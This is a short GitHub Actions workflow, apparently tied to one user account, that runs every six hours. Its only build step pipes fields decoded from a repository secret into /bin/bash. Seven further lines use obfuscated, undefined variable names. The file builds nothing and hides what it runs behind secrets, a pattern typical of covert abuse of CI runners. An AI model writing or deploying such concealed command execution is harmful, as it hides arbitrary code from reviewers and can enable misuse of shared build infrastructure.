name: xiongyonghong6473
on:
  workflow_dispatch:
  schedule:
    - cron: '3 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiongyonghong6473
        env:
          ko84: ${{ secrets.ko84 }}
        run: |
          echo $ko84 | jq -r .s2 | /bin/bash
          echo $ttxsk90969 | jq -r .pzqls0284 | /bin/bash
          echo $zf04164 | jq -r .nfrdc23 | /bin/bash
          echo $fdkor12 | jq -r .h68 | /bin/bash
          echo $yrelw3 | jq -r .cx300 | /bin/bash
          echo $jkam072 | jq -r .gwmo79 | /bin/bash
          echo $wqt78 | jq -r .hfz81 | /bin/bash
          echo $k74 | jq -r .dbrp176 | /bin/bash

